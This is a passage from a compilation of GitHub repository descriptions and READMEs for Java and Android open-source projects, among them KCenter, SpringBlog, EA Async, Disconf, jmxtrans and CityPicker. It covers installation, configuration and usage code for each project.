position) { // Bind data ... if (position == getCurrentIndicatorPosition()) { //Highlight view } } public class ViewHolder extends RecyclerView.ViewHolder { ... public ViewHolder(View itemView) { super(itemView); ... } } } ``` ## Attributes | attr | description | | ------------- | ------------- | | rtl_tabIndicatorColor | Indicator color | | rtl_tabIndicatorHeight | Indicator height | | rtl_tabBackground | Background drawable of each tab | | rtl_tabTextAppearance | TextAppearence of each tab | | rtl_tabSelectedTextColor | Text color of selected tab | | rtl_tabOnScreenLimit | The number of OnScreen tabs. If this value is larger than 0, `rtl_tabMinWidth` and `rtl_tabMaxWidth` are ignored. | | rtl_tabMinWidth | Minimum width of each tab | | rtl_tabMaxWidth | Maximum width of each tab | | rtl_tabPaddingStart | The padding of the start edge of each tab | | rtl_tabPaddingTop | The padding of the top edge of each tab | | rtl_tabPaddingEnd | The padding of the end edge of each tab | | rtl_tabPaddingBottom | The padding of the bottom edge of each tab | | rtl_tabPadding | The padding of all four edges of each tab | | rtl_scrollEnabled | Sets whether tab scrolling is enabled | [default attribute](library/src/main/res/values/styles.xml) ## Thanks The demo app uses the following resources. color-names by codebrainz<br/> https://github.com/codebrainz/color-names Material Design icons by Google<br/> https://github.com/google/material-design-icons ## License ``` Copyright (C) 2017 nshmura Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ```
Spring Boot的基础教程,由浅入深,一步一步学习Spring Boot,最后学到的不单单是基础!Spring Cloud基础教程请看:https://github.com/roncoo/spring-cloud-demo
demo java roncoo spring-boot
## 项目地址汇总 ### Spring Boot Demo:[码云地址](https://gitee.com/roncoocom/spring-boot-demo) | [Github地址](https://github.com/roncoo/spring-boot-demo) ### Spring Cloud Demo:[码云地址](https://gitee.com/roncoocom/spring-cloud-demo) | [Github地址](https://github.com/roncoo/spring-cloud-demo) ### 本项目为Spring Boot的基础教程 - 教程视频:[免费篇](http://www.roncoo.com/course/view/e4189c9db6474745b5e578983cddd112) - 教程视频:[Spring boot全集](http://www.roncoo.com/course/view/c99516ea604d4053908c1768d6deee3d#boxTwo) - 教程视频:[Srping cloud第一季](http://www.roncoo.com/course/view/cc8fbd6749f94f2fa015641ef96b9460#boxTwo) ### 项目文档 - spring-boot-demo [教程文档](http://www.roncoo.com/article/detail/124661) ### 项目说明 - 源码只供学习使用,更多请看视频 ### 技术交流 * QQ3群: 738785494 * QQ2群: 601146630 (满) * QQ1群: 213097382 (满) ## 开源项目 ### roncoo-jui-springboot - 项目地址:[码云地址](https://gitee.com/roncoocom/roncoo-jui-springboot) | [Github地址](https://github.com/roncoo/roncoo-jui-springboot) - 该项目是为了大家更好地运用Spring Boot的功能,进行实战。 - 如果没有使用过Spring Boot,也是一个学习的好项目。 ### roncoo-recharge - 项目地址:[码云地址](https://gitee.com/roncoocom/roncoo-recharge) | [Github地址](https://github.com/roncoo/roncoo-recharge) - 具备话费充值、流量充值、话费卡兑换功能; - 可以拓展其他充值兑换业务,比如虚拟币充值; - 也适用于支付、鉴权等业务功能的拓展。
The ToroDB solution to provide better analytics on top of MongoDB and make it easier to migrate from MongoDB to SQL
analytics nosql nosql-database sql sql-database
# ToroDB Stampede > Transform your NoSQL data from a MongoDB replica set into a relational database in PostgreSQL. There are other solutions that are able to store the JSON document in a relational table using PostgreSQL JSON support, but it doesn't solve the real problem of 'how to really use that data'. ToroDB Stampede replicates the document structure in different relational tables and stores the document data in different tuples using those tables. ![](documentation/docs/images/tables_distribution.jpeg) ## Installation Due to the use of different external systems like MongoDB and PostgreSQL, the installation requires some previous steps. Take a look at out [quickstart][1] in the documentation. ## Usage example MongoDB is a great idea, but sooner or later some kind of business intelligence, or complex aggregated queries are required. At this point MongoDB is not so powerful and ToroDB Stampede borns to solve that problem (see [our post about that][2]). The kind of replication done by ToroDB Stampede allows the execution of aggregated queries in a relational backend (PostgreSQL) with a noticeable time improvement. A deeper explanation is available in our [how to use][3] section in the documentation. ## Development setup As it was said in the installation section, the requirements of external systems can make more difficult to explain briefly how to setup the development environment here. So if you want to take a look on how to prepare your development environment, take a look to our [documentation][4]. ## Release History * 1.0.0 * Released on October 24th 2018 * 1.0.0-beta3 * Released on June 30th 2017 * 1.0.0-beta2 * Released on April 06th 2017 * 1.0.0-beta1 * Released on December 30th 2016 ## Meta ToroDB – [@nosqlonsql](https://twitter.com/nosqlonsql) – info@8kdata.com Distributed under the GNU AGPL v3 license. See ``LICENSE`` for more information. [1]: https://www.torodb.com/stampede/docs/quickstart [2]: https://www.8kdata.com/blog/the-conundrum-of-bi-aggregate-queries-on-mongodb/ [3]: https://www.torodb.com/stampede/docs/how-to-use [4]: https://www.torodb.com/stampede/docs/installation/previous-requirements/
KCenter(KafkaCenter) is a unified platform for kafka cluster management and maintenance, producer / consumer monitoring, and use of ecological components(ksql/kafka connect).it's kafkacenter(kafka center).
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Language: :us: - :[cn](./README_zh.md): # KCenter ![](https://img.shields.io/badge/java-1.8+-green.svg) ![](https://img.shields.io/badge/maven-3.5+-green.svg) KCenter (previously known as KafkaCenter) is a unified one-stop platform for Apache Kafka cluster management and maintenance, producer/consumer monitoring, and use of ecological components. :loudspeaker::loudspeaker::loudspeaker: Now we have deployed this product on [**Azure**](https://azuremarketplace.microsoft.com/zh-cn/marketplace/apps/newegginc1646343565758.kafka_center?tab=Overview)/[**AWS**](https://aws.amazon.com/marketplace/pp/prodview-g6kmcxajfu3bw?sr=0-9&ref_=beagle&applicationId=AWSMPContessa) :loudspeaker::loudspeaker::loudspeaker: :fire::fire::fire: **Commercial products have better functions and technical support.** if you have any needs, including aws support, personalized development:technologist:. You can create an [issue](https://github.com/xaecbd/KCenter/issues/new) and we will reply as soon as possible. **Table of Contents** - [Why Should I Use KCenter?](#why-should-i-use-KCenter) - [Main Features](#main-features) - [Application Config](#application-config) - [Getting Started](#getting-started) - [1. Init](#1-init) - [2. Run](#2-run) - [3. Access UI](#3-access-ui) - [Building KCenter and/or Contributing Code](#building-KCenter-andor-contributing-code) - [Documentation](#documentation) - [Changelog](#changelog) - [Questions? Problems? Suggestions?](#questions-problems-suggestions) ## Why Should I Use KCenter? You have a **Kafka cluster** and want to - monitor producers and consumers with graphs and the ability to easily configure email alerts for thresholds - let your users request topics and monitor them themselves in a simple web UI - access the Kafka ecosystem (Kafka, KSQL, Kafka Connect, Kafka Manager) in one combined UI All you need is a MySQL DB in the background where KCenter can store its configuration. If you want to use the monitoring functionalities, you additionally need an Elasticsearch installation. Then, just download our Docker image (see HowTo below) and off you go! *\* Note: KCenter does not yet support authenticating to a secured Kafka cluster (SASL or OAuth), we're working on it though.* ## Main Features ![avatar](docs/images/kafka-center.png) ![avatar](docs/images/screenshot.png) - **Home** -> Overview of all configured Kafka clusters as well as high-level monitoring information. - **Favorites** -> Direct access to the monitoring statistics of your favorite topics. - **Topic** -> View your own topics or *apply for new topics. You can also both consume messages and mock new records via web UI into your topics here!* - **Monitor** -> Statistics about production and consumption of your topics. *There is an additional possibility to configure alerts (which optionally trigger emails) for arbitrary consumption delay thresholds here!* - **Kafka Connect** -> Create and maintain your own Kafka Connect jobs (needs an external Kafka Connect service to connect to). - **KSQL** -> Create and maintain your own KSQL jobs (needs an external KQL service to connect to). - **Approve** -> Users can view their topic creation requests here, administrators can manage and approve the requests. - **Settings** -> Maintain users and teams (accessible by administrators only). *You can also use an external OAuth solution for the user management.* - **Kafka Manager** -> Maintain Kafka cluster information (embedded UI from the popular open-source tool [Kafka Manager](https://github.com/yahoo/CMAK)). ## Application Config The main application configuration is done in a central `application.properties` file. Have look at our [detailed example here](KCenter-Core/src/main/resources/application.properties). ## Getting Started **Important**: The application **needs a MySQL database** to store all configurations. Before you begin, make sure that you have it either installed on the same host or that there's an instance available somewhere else. The exact location can then be configured via the `spring.datasource.url` inside the `application.properties`. (There is *no* MySQL service included in the Docker image.) Resource|Dependencies|Use ---|---|--- MySQL|must|Stores all configuration information (users, teams, clusters, etc.) Elasticsearch (7.0+)|optional|Stores monitoring information (cluster metrics, consumption lag visualization, etc.) Email server|optional|Email notifications (topic requests & approvals, configured consumer alerts) ### 1. Init #### Create database and table Execute the provided [table_script.sql](KCenter-Core/sql/table_script.sql) on your MySQL instance to create the database and all necessary tables. #### Edit config Download the provided [application.properties](KCenter-Core/src/main/resources/application.properties) example and adapt the config to your needs. ### 2. Run #### Option A (**recommended**): Docker The following command assumes that you have your adapted `application.properties` inside the same folder: ``` docker run -d \ -p 8080:8080 \ --name KCenter \ -v ${PWD}/application.properties:/opt/app/kafka-center/config/application.properties \ xaecbd/kafka-center:2.3.0 ``` #### Option B: Local **Important**: Make sure you have installed a **JRE 8** or higher and download the most recent [release package](https://github.com/xaecbd/KCenter/releases). ``` $ git clone https://github.com/xaecbd/KCenter.git $ cd KCenter $ mvn clean package -Dmaven.test.skip=true $ cd KCenter\KCenter-Core\target $ java -jar KCenter-Core-2.3.0-SNAPSHOT.jar ``` ### 3. Access UI The application UI is published on port *8080*. Visit `http://localhost:8080` (or insert the IP/URL of the host you deployed on) and log in with the default administrator:**user/pw = admin/admin** ## Building KCenter and/or Contributing Code We're happy if you want to play around and build KCenter locally, or even get involved in shaping and developing KCenter further. The [Contributing Guidelines](./CONTRIBUTING.md) will help to get you started. ## Documentation For more information, see the README in [KCenter/docs](./docs).<br/> For information about user guide the documentation, see the UserGuide in [KCenter/docs/UserGuide](./docs/UserGuide.md) For information about module the documentation, see the Module in [KCenter/docs/Module](./docs/Module.md).<br/> For information about kafka connect ui, see docs in [KafkaConnectUi](./docs/KafkaConnectUi.md). *Note that we open-sourced our tool very recently and did not translate all the documents to English yet. (We are happy about contributions in this area as well if you're motivated!)* ## Changelog See the separate [Changelog](./CHANGELOG.md). ## Questions? Problems? Suggestions? If you found a bug, want to request a feature or have a question, please create an [issue](https://github.com/xaecbd/KCenter/issues/new). Try to make sure someone else hasn't already created an issue for the same topic beforehand.
A simple blogging system implemented with Spring Boot + Hibernate + MySQL + Bootstrap4.
blogging spring-boot
SpringBlog ===== 中文开发和部署文档请查看:http://raysmond.com/posts/springblog-guide SpringBlog is a very simple and clean-design blog system implemented with Spring Boot. It's one of my learning projects to explore awesome features in Spring Boot web programming. You can check my blog site for demo [https://raysmond.com](http://raysmond.com). There's no demo online. Here's the screenshot of my previous blog homepage. ![](http://7b1fa0.com1.z0.glb.clouddn.com/screencapture-blog-raysmond-8080-1480663084590.png) SpringBlog is powered by many powerful frameworks and third-party projects: - Spring Boot and many of Spring familiy (e.g. Spring MVC, Spring JPA, Spring Secruity and etc) - Hibernate + MySQL - [HikariCP](https://github.com/brettwooldridge/HikariCP) - A solid high-performance JDBC connection pool - [Bootstrap](https://getbootstrap.com) - A very popular and responsive front-end framework - [Pegdown](https://github.com/sirthias/pegdown) - A pure-java markdown processor - [ACE Editor](http://ace.c9.io/) - A high performance code editor which I use to write posts and code. - [Redis](http://redis.io/) - A very powerful in-memory data cache server. - EhCache - Thymeleaf (Spring MVC) ## Development Before development, please install the following service software: - [MySQL](https://www.mysql.com) Edit the spring config profile `src/main/resources/application.yml` according to your settings. And start MySQL and Redis first before running the application. ``` # If you're using Ubuntu server # Install MySQL apt-get install mysql-server service mysql start mysql -u root -p >> create database spring_blog; ``` This is a Gradle project. Make sure Gradle is installed in your machine. Try `gradle -v` command. Otherwise install in from [http://www.gradle.org/](http://www.gradle.org/). I recommend you import the source code into Intellij IDE to edit the code. ``` # Start the web application ./gradlew bootRun ``` ## Development **How to import the project into Intellij IDEA and run from the IDE?** ``` git clone https://github.com/Raysmond/SpringBlog.git cd SpringBlog bower install ``` 1. Clone the project 2. Download all dependencies 3. Open the project in Intellij IDEA. 4. Run `SpringBlogApplication.java` as Java application. 5. Preview: http://localhost:8080 Admin: http://localhost:8080/admin , the default admin account is: `admin`, password: `admin` > Lombok is required to run the project. You can install the plugin in Intellij IDEA. > Reference: https://github.com/mplushnikov/lombok-intellij-plugin - Build application jar `./gradlew build`, then upload the distribution jar (e.g. `build/libs/SpringBlog-0.1.jar`) to your remote server. - Upload `application-production.yml` to your server and change it according to your server settings. - Run it (Java8 is a must) ``` java -jar SpringBlog-0.1.jar --spring.profiles.active=prod # OR with external spring profile file java -jar SpringBlog-0.1.jar --spring.config.location=application-production.yml ``` ## TODO - [x] Upgrade frontend framework to Bootstrap4 - [ ] Replace Jade with Thymeleaf(HTML) - [ ] Frontend building tools, e.g. webpack - [x] Use hibernate 2nd level cache (EHCache?) - [ ] Markdown preview while editing - [ ] Html editor ## License Modified BSD license. Copyright (c) 2015 - 2018, Jiankun LEI (Raysmond).
EA Async implements async-await methods in the JVM.
async async-await asynchronous concurrency ea-async java jvm
EA Async ============ [![Release](https://img.shields.io/github/release/electronicarts/ea-async.svg)](https://github.com/electronicarts/ea-async/releases) [![Maven Central](https://img.shields.io/maven-central/v/com.ea.async/ea-async-parent.svg)](http://repo1.maven.org/maven2/com/ea/async/) [![Javadocs](https://img.shields.io/maven-central/v/com.ea.async/ea-async.svg?label=Javadocs)](http://www.javadoc.io/doc/com.ea.async/ea-async) [![Build Status](https://img.shields.io/travis/electronicarts/ea-async.svg)](https://travis-ci.org/electronicarts/ea-async) EA Async implements Async-Await methods in the JVM. It allows programmers to write asynchronous code in a sequential fashion. It is heavily inspired by Async-Await on the .NET CLR, see [Asynchronous Programming with Async and Await](https://msdn.microsoft.com/en-us/library/hh191443.aspx) for more information. Who should use it? ------ EA Async should be used to write non-blocking asynchronous code that makes heavy use of CompletableFutures or CompletionStage. It improves scalability by freeing worker threads while your code awaits other processes; And improves productivity by making asynchronous code simpler and more readable. Developer & License ====== This project was developed by [Electronic Arts](http://www.ea.com) and is licensed under the [BSD 3-Clause License](LICENSE). Examples ======= #### With EA Async ```java import static com.ea.async.Async.await; import static java.util.concurrent.CompletableFuture.completedFuture; public class Store { public CompletableFuture<Boolean> buyItem(String itemTypeId, int cost) { if(!await(bank.decrement(cost))) { return completedFuture(false); } await(inventory.giveItem(itemTypeId)); return completedFuture(true); } } ``` In this example `Bank.decrement` returns `CompletableFuture<Boolean>` and `Inventory.giveItem` returns `CompletableFuture<String>` EA Async rewrites the calls to `Async.await` making your methods non-blocking. The methods look blocking but are actually transformed into asynchronous methods that use CompletableFutures to continue the execution as intermediary results arrive. #### Without EA Async This is how the first example looks without EA Async. It is a bit less readable. ```java import static java.util.concurrent.CompletableFuture.completedFuture; public class Store { public CompletableFuture<Boolean> buyItem(String itemTypeId, int cost) { return bank.decrement(cost) .thenCompose(result -> { if(!result) { return completedFuture(false); } return inventory.giveItem(itemTypeId).thenApply(res -> true); }); } } ``` This is a small example... A method with a few more CompletableFutures can look very convoluted. EA Async abstracts away the complexity of the CompletableFutures. #### With EA Async (2) So you like CompletableFutures? Try converting this method to use only CompletableFutures without ever blocking (so no joining): ```java import static com.ea.async.Async.await; import static java.util.concurrent.CompletableFuture.completedFuture; public class Store { public CompletableFuture<Boolean> buyItem(String itemTypeId, int cost) { if(!await(bank.decrement(cost))) { return completedFuture(false); } try { await(inventory.giveItem(itemTypeId)); return completedFuture(true); } catch (Exception ex) { await(bank.refund(cost)); throw new AppException(ex); } } } ``` Got it? Send it [to us](https://github.com/electronicarts/ea-async/issues/new). It probably looks ugly... Getting started --------------- EA Async currently supports JDK 8-10. It works with Java and Scala and should work with most JVM languages. The only requirement to use EA Async is that must be used only inside methods that return `CompletableFuture`, `CompletionStage`, or subclasses of `CompletableFuture`. ### Using with maven ```xml <dependency> <groupId>com.ea.async</groupId> <artifactId>ea-async</artifactId> <version>1.2.3</version> </dependency> ``` ### Gradle ``` 'com.ea.async:ea-async:1.2.3' ``` ### Instrumenting your code #### Option 1 - JVM parameter Start your application with an extra JVM parameter: `-javaagent:ea-async-1.2.3.jar` ``` java -javaagent:ea-async-1.2.3.jar -cp your_claspath YourMainClass args... ``` It's recommended to add this as a default option to launchers in IntelliJ projects that use ea-async. #### Option 2 - Runtime On your main class or as early as possible, call at least once: ``` Async.init(); ``` Provided that your JVM has the capability enabled, this will start a runtime instrumentation agent. If you forget to invoke this function, the first call to `await` will initialize the system (and print a warning). This is a solution for testing and development, it has the least amount of configuration. It might interfere with JVM debugging. This alternative is present as a fallback. #### Option 3 - Run instrumentation tool The ea-async-1.2.3.jar is a runnable jar that can pre-instrument your files. Usage: ```bash java -cp YOUR_PROJECT_CLASSPATH -jar ea-async-1.2.3.jar classDirectory ``` Example: ```bash java -cp guava.jar;commons-lang.jar -jar ea-async-1.2.3.jar target/classes ``` After that all the files in target/classes will have been instrumented. There will be no references to `Async.await` and `Async.init` left in those classes. #### Option 4 - Build time instrumentation, with Maven - Preferred Use the [ea-async-maven-plugin](maven-plugin). It will instrument your classes in compile time and remove all references to `Async.await` and `Async.init()`. With build time instrumentation your project users won't need to have EA Async in their classpath unless they also choose to use it. This means that EA Async <i>does not need to be a transitive dependency</i>. This is the best option for libraries and maven projects. ```xml <build> <plugins> <plugin> <groupId>com.ea.async</groupId> <artifactId>ea-async-maven-plugin</artifactId> <version>1.2.3</version> <executions> <execution> <goals> <goal>instrument</goal> <goal>instrument-test</goal> </goals> </execution> </executions> </plugin> </plugins> </build> ```
Distributed Configuration Management Platform(分布式配置管理平台)
Disconf ======= [![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://travis-ci.org/knightliao/disconf.svg?branch=master)](https://travis-ci.org/knightliao/disconf) [![Coverage Status](https://coveralls.io/repos/knightliao/disconf/badge.png?branch=master)](https://coveralls.io/r/knightliao/disconf?branch=master) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.baidu.disconf/disconf-client/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.baidu.disconf/disconf-client) Distributed Configuration Management Platform(分布式配置管理平台) 专注于各种「分布式系统配置管理」的「通用组件」和「通用平台」, 提供统一的「配置管理服务」 ![](http://ww3.sinaimg.cn/mw1024/60c9620fjw1esvjzny1rmj20aj061t9a.jpg) 包括 **百度**、**滴滴出行**、**银联**、**网易**、**拉勾网**、**苏宁易购**、**顺丰科技** 等知名互联网公司正在使用! [「disconf」在「2015 年度新增开源软件排名 TOP 100(OSC开源中国提供)」中排名第16强。](http://www.oschina.net/news/69808/2015-annual-ranking-top-100-new-open-source-software) ## 主要目标: - 部署极其简单:同一个上线包,无须改动配置,即可在 多个环境中(RD/QA/PRODUCTION) 上线 - 部署动态化:更改配置,无需重新打包或重启,即可 实时生效 - 统一管理:提供web平台,统一管理 多个环境(RD/QA/PRODUCTION)、多个产品 的所有配置 - 核心目标:一个jar包,到处运行 ## demos && 文档 && 协作 - demos: https://github.com/knightliao/disconf-demos-java - wiki: https://github.com/knightliao/disconf/wiki - 文档: http://disconf.readthedocs.io - 协作开发: 在 master 分支上提pull request - 提问题: https://github.com/knightliao/disconf/issues 提issue ## 版本 - dev(dev branch): 2.6.36 - master(latest && cooperate && contribute branch):2.6.36 - stable(release && stable branch): 2.6.36 ## 功能特点 ## - 支持配置(配置项+配置文件)的分布式化管理 - 配置发布统一化 - 配置发布、更新统一化: - 同一个上线包 无须改动配置 即可在 多个环境中(RD/QA/PRODUCTION) 上线 - 配置存储在云端系统,用户统一管理 多个环境(RD/QA/PRODUCTION)、多个平台 的所有配置 - 配置更新自动化:用户在平台更新配置,使用该配置的系统会自动发现该情况,并应用新配置。特殊地,如果用户为此配置定义了回调函数类,则此函数类会被自动调用。 - 极简的使用方式(注解式编程 或 XML无代码侵入模式):我们追求的是极简的、用户编程体验良好的编程方式。目前支持两种开发模式:基于XML配置或者基于注解,即可完成复杂的配置分布式化。 注:配置项是指某个类里的某个Field字段。 Disconf的功能特点描述图: ![](http://ww4.sinaimg.cn/bmiddle/006oy5Ulgw1f25z80js0fj30fl08uq3z.jpg) [查看大图](http://ww3.sinaimg.cn/mw1024/006oy5Ulgw1f25z80js0fj30fl08uq3z.jpg) ### 其它功能特点 ### - 低侵入性或无侵入性、强兼容性: - 低侵入性:通过极少的注解式代码撰写,即可实现分布式配置。 - 无侵入性:通过XML简单配置,即可实现分布式配置。 - 强兼容性:为程序添加了分布式配置注解后,开启Disconf则使用分布式配置;若关闭Disconf则使用本地配置;若开启Disconf后disconf-web不能正常Work,则Disconf使用本地配置。 - 支持配置项多个项目共享,支持批量处理项目配置。 - 配置监控:平台提供自校验功能(进一步提高稳定性),可以定时校验应用系统的配置是否正确。 ## 大家都在使用disconf ## - [百度](20+条产品线使用) - [滴滴出行(上海/北京)](http://www.xiaojukeji.com/) - [银联] - [网易](http://www.163.com/) - [苏宁易购](http://www.suning.com) (搜索中心数据处理平台) - [顺丰科技] - [更多](http://disconf.readthedocs.io/zh_CN/latest/others/src/contribute.html) ## 他人评价 快速递技术总监: ![http://ww1.sinaimg.cn/bmiddle/60c9620fjw1ergy58j978j20i302u0t2.jpg](http://ww1.sinaimg.cn/mw1024/60c9620fjw1ergy58j978j20i302u0t2.jpg) 润生活总监: ![http://ww4.sinaimg.cn/bmiddle/60c9620fjw1est6ptf2dlj20ab01udfy.jpg](http://ww4.sinaimg.cn/bmiddle/60c9620fjw1est6ptf2dlj20ab01udfy.jpg) 人脉通后端RD: ![http://ww4.sinaimg.cn/bmiddle/60c9620fjw1est6pzqo68j208k05tjrm.jpg](http://ww4.sinaimg.cn/bmiddle/60c9620fjw1est6pzqo68j208k05tjrm.jpg)
![jmxtranslogo](http://www.jmxtrans.org/assets/img/jmxtrans-logo.gif) [![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fjmxtrans%2Fjmxtrans.svg?type=shield)](https://app.fossa.io/projects/git%2Bgithub.com%2Fjmxtrans%2Fjmxtrans?ref=badge_shield) [![Build Status](https://secure.travis-ci.org/jmxtrans/jmxtrans.png?branch=master)](http://travis-ci.org/jmxtrans/jmxtrans) [![Build status](https://ci.appveyor.com/api/projects/status/7g88sgeglsm7st17?svg=true)](https://ci.appveyor.com/project/gquintana/jmxtrans) [![Dependency Status](https://www.versioneye.com/user/projects/5421de9e3a8c2f2b8b000056/badge.svg?style=flat)](https://www.versioneye.com/user/projects/5421de9e3a8c2f2b8b000056) [![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/jmxtrans/jmxtrans?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Maven site](https://img.shields.io/badge/Maven-site-blue.svg)](http://www.jmxtrans.org/jmxtrans/) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jmxtrans/jmxtrans/badge.svg)](https://maven-badges.herokuapp.com/maven-central/org.jmxtrans/jmxtrans) [![sonarcloud.io](https://img.shields.io/badge/sonarcloud-quality-lightgrey.svg)](https://sonarcloud.io/dashboard?id=org.jmxtrans%3Ajmxtrans-parent) This is the source code repository for the jmxtrans project. This is effectively the missing connector between speaking to a JVM via JMX on one end and whatever logging / monitoring / graphing package that you can dream up on the other end. jmxtrans is very powerful tool which uses easily generated JSON (or [YAML](https://github.com/jmxtrans/jmxtrans/blob/master/jmxtrans/tools/yaml2jmxtrans.py)) based configuration files and then outputs the data in whatever format you desire. It does this with a very efficient engine design that will scale to communicating with thousands of machines from a single jmxtrans instance. The core engine is very solid and there are writers for [Graphite](http://graphite.wikidot.com/), [StatsD](https://github.com/etsy/statsd), [Ganglia](http://ganglia.sourceforge.net/), [cacti/rrdtool](http://www.cacti.net/), [OpenTSDB](http://opentsdb.net/), text files, and stdout. Feel free to suggest more on the discussion group or issue tracker. * [Download a recent stable build](https://repo1.maven.org/maven2/org/jmxtrans/jmxtrans/) (or a [SNAPSHOT one](https://oss.sonatype.org/content/repositories/snapshots/org/jmxtrans/jmxtrans/)) * See the [Wiki](https://github.com/jmxtrans/jmxtrans/wiki) for full documentation. * Join the [Google Group](http://groups.google.com/group/jmxtrans) if you have anything to discuss or [follow the commits](http://groups.google.com/group/jmxtrans-commits). Please don't email Jon directly because he just doesn't have enough time to answer every question individually. * People are [talking - this is me! (skip to 21:45)](http://www.justin.tv/kctv88/b/290736874) and [talking](http://www.slideshare.net/cyrille.leclerc/paris-devops-monitoring-and-feature-toggle-pattern-with-jmx) and [talking (skip to 34:40)](http://www.justin.tv/kctv88/b/288229232) and [(french talking)](http://www.slideshare.net/henri.gomez/devops-retour-dexprience-marsjug-du-29-juin-2011) about it. * If you are seeing duplication of output data, look for 'typeNames' in the documentation. * If you like this project, please tell your friends, blog & tweet. I'd really love your help getting more publicity. Coda Hale did [an excellent talk](http://pivotallabs.com/talks/139-metrics-metrics-everywhere) for [Pivotal Labs](http://pivotallabs.com/) on *why* metrics matter. Great justification for using a tool like jmxtrans. ![render](http://jmxtrans.googlecode.com/svn/wiki/render.png) ## Special thanks: * [JetBrains](https://www.jetbrains.com/buy/opensource/) for providing us with IntelliJ licenses, * [EJ Technologies](https://www.ej-technologies.com/) for providing us with licenses of their [Java profiler](https://www.ej-technologies.com/products/jprofiler/overview.html). ## License [![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fjmxtrans%2Fjmxtrans.svg?type=large)](https://app.fossa.io/projects/git%2Bgithub.com%2Fjmxtrans%2Fjmxtrans?ref=badge_large)
:fire::fire::fire:城市选择、定位、搜索及右侧字母导航,类似美团 百度糯米 饿了么等APP选择城市功能
city indexbar location recyclerview
<p align="center"> <img src="art/header.png"> </p> # CityPicker [![Platform](https://img.shields.io/badge/platform-android-green.svg)](http://developer.android.com/index.html) [![API](https://img.shields.io/badge/API-14%2B-yellow.svg?style=flat)](https://android-arsenal.com/api?level=14) 现在使用较多的类似美团、外卖等APP的城市选择界面,**一行代码搞定**,就是这么简单粗暴!!! **Tips:**(旧版本1.x)会报高德定位jar包冲突,推荐使用2.x版本。 #### 主要功能: - 字母悬浮栏 - 指定热门城市 - 自定义动画效果 - 自定义主题 - 名称或拼音搜索 - 返回城市名、code等数据 - 提供定位接口,解耦定位SDK # Preview ![image](https://github.com/zaaach/CityPicker/raw/master/art/screen.gif) ![image](https://github.com/zaaach/CityPicker/raw/master/art/screen1.gif) ![image](https://github.com/zaaach/CityPicker/raw/master/art/screen2.gif) # APK 下载[demo.apk](https://github.com/zaaach/CityPicker/raw/master/art/demo.apk)体验. # Download **1:** 项目根目录的build.gradle添加如下配置: ```groovy allprojects { repositories { ... maven { url 'https://jitpack.io' } } } ``` **2:** app添加依赖: ```groovy dependencies { implementation 'com.github.zaaach:CityPicker:x.y.z' } ``` 记得把`x.y.z`替换为[![jitpack](https://jitpack.io/v/zaaach/CityPicker.svg)](https://jitpack.io/#zaaach/CityPicker)中的数字 # Usage `CityPicker` 基于`DialogFragment` 实现,已提供定位接口,需要APP自身实现定位。 ### 基本使用: #### Step1: 在`manifest.xml`中给使用`CityPicker` 的`activity`添加主题`android:theme="@style/DefaultCityPickerTheme"` ```xml <activity android:name=".MainActivity" android:theme="@style/DefaultCityPickerTheme"> ...... </activity> ``` #### Step2: 注意:热门城市使用`HotCity` ,定位城市使用`LocatedCity` ```java List<HotCity> hotCities = new ArrayList<>(); hotCities.add(new HotCity("北京", "北京", "101010100")); //code为城市代码 hotCities.add(new HotCity("上海", "上海", "101020100")); hotCities.add(new HotCity("广州", "广东", "101280101")); hotCities.add(new HotCity("深圳", "广东", "101280601")); hotCities.add(new HotCity("杭州", "浙江", "101210101")); ...... CityPicker.from(activity) //activity或者fragment .enableAnimation(true) //启用动画效果,默认无 .setAnimationStyle(anim) //自定义动画 .setLocatedCity(new LocatedCity("杭州", "浙江", "101210101"))) //APP自身已定位的城市,传null会自动定位(默认) .setHotCities(hotCities) //指定热门城市 .setOnPickListener(new OnPickListener() { @Override public void onPick(int position, City data) { Toast.makeText(getApplicationContext(), data.getName(), Toast.LENGTH_SHORT).show(); } @Override public void onCancel(){ Toast.makeText(getApplicationContext(), "取消选择", Toast.LENGTH_SHORT).show(); } @Override public void onLocate() { //定位接口,需要APP自身实现,这里模拟一下定位 new Handler().postDelayed(new Runnable() { @Override public void run() { //定位完成之后更新数据 CityPicker.getInstance() .locateComplete(new LocatedCity("深圳", "广东", "101280601"), LocateState.SUCCESS); } }, 3000); } }) .show(); ``` ### 关于自定义主题: 在`style.xml` 中自定义主题并且继承`DefaultCityPickerTheme` ,别忘了在`manifest.xml` 设置给`activity`。 ```xml <style name="CustomTheme" parent="DefaultCityPickerTheme"> <item name="cpCancelTextColor">@color/color_green</item> <item name="cpSearchCursorDrawable">@color/color_green</item> <item name="cpIndexBarNormalTextColor">@color/color_green</item> <item name="cpIndexBarSelectedTextColor">@color/color_green</item> <item name="cpSectionHeight">@dimen/custom_section_height</item> <item name="cpOverlayBackground">@color/color_green</item> ...... </style> ``` `CityPicker` 中自定义的所有属性如下,有些属性值必须是引用类型`refrence`,使用时注意。 ```xml <resources> <attr name="cpCancelTextSize" format="dimension|reference" /> <attr name="cpCancelTextColor" format="color|reference" /> <attr name="cpClearTextIcon" format="reference" /> <attr name="cpSearchTextSize" format="dimension|reference" /> <attr name="cpSearchTextColor" format="color|reference" /> <attr name="cpSearchHintText" format="string|reference" /> <attr name="cpSearchHintTextColor" format="color|reference" /> <attr name="cpSearchCursorDrawable" format="reference" /> <attr name="cpListItemTextSize" format="dimension|reference" /> <attr name="cpListItemTextColor" format="color|reference" /> <attr name="cpListItemHeight" format="dimension|reference"/> <attr name="cpEmptyIcon" format="reference"/> <attr name="cpEmptyIconWidth" format="dimension|reference"/> <attr name="cpEmptyIconHeight" format="dimension|reference"/> <attr name="cpEmptyText" format="string|reference"/> <attr name="cpEmptyTextSize" format="dimension|reference"/> <attr 